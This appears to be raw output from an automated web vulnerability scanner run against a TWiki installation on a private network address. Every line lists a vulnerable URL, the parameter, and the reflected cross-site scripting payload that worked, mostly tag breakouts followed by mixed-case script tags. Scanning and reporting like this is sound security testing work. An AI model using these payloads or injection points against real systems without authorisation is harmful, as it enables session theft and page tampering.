http://192.168.105.200/twiki/bin/view/TWiki/WebHomeaAiLtumIynHm?rev=1.120 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebHomeaAiLtumIynHm?rev=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >TEkv(1430)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >YTNk(8918)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >Oolg(6307)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore&param1=1.7&param2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qUdy(5462)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >uetF(4595)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >GKmg(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WAIu(8154)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >egoY(6294)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev1=1.54&rev2=1.53 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >oKNc(1521)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >tybb(7137)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Yexv(7145)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >PvBK(7846)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >mCVp(3126)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >nqgT(1391)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >nGCz(5657)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?skin=print&rev=1.35 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?skin=print&rev=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:<ScRiPt >VMdi(7820)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZSpc(8678)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >HhLm(2117)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Pszn(4743)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?skin=print&rev=1.12 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?skin=print&rev=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:<ScRiPt >pKAY(6782)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pQDH(8432)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore&param1=1.5&param2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Flox(1409)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >xERz(7035)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebPreferences?rev=r1.38 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebPreferences?rev=r1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >RLoj(1678)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rSks(2119)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev1=1.23&rev2=1.22 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev1=1.23&rev2=1.22%3C%2Ftitle%3E%3CScRiPt %3ENKzE(8922)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >NKzE(8922)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >fiZg(7466)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev=r1.54 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiPreferencesoWuBVEKVgQrg?rev=r1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >JCdr(2730)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >NNCM(7600)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >djZh(6990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bMAU(9099)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore&param1=1.18&param2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore&param1=1.18&param2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VQVr(3209)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >wsPj(6214)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >gLxV(2864)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >STRM(7528)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore&param1=1.6&param2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >YTNk(8918)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >vngn(6845)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >HeZn(4491)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.38&param2=1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >NOkX(1910)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >UbAX(8618)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.120&param2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.120&param2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qyDI(7224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >JDrO(8158)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore&param1=1.10&param2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ySpY(7995)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bZGd(6387)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore&param1=1.24&param2=1.24 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tiQU(3083)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiName?rev=r1.3 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiName?rev=r1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Hdzc(3324)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tWPZ(1509)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >NjOP(5062)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >fzqk(9382)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >fBam(6309)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Cshr(9544)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >HJxt(5971)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >WAIu(8154)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >JqBB(3410)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >UiBV(7883)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >cYAl(3179)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >KdsD(9762)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VDVU(9666)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/TWikiAdminGroup?rev2=1.1&rev1=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >VNjr(5537)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore&param1=1.1&param2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WISF(5898)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >GmTl(7015)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore&param1=1.20&param2=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Hsqa(8711)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >UGjL(9051)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev1=1.35&rev2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >mCVp(3126)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >WrvH(6068)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore&param1=1.10&param2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore&param1=1.10&param2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TkHx(4037)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebHomeaAiLtumIynHm?rev1=1.121&rev2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >fBam(6309)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cyQR(4809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore&param1=1.13&param2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >BdYH(6576)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore&param1=1.3&param2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >PvBK(7846)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >lVtk(9498)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup&param1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup&param1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >CWgd(4435)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >bfdQ(6042)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore&param1=1.54&param2=1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >XrtI(9115)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore&param1=1.33&param2=1.33 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pZJp(6331)</ScRiPt> |
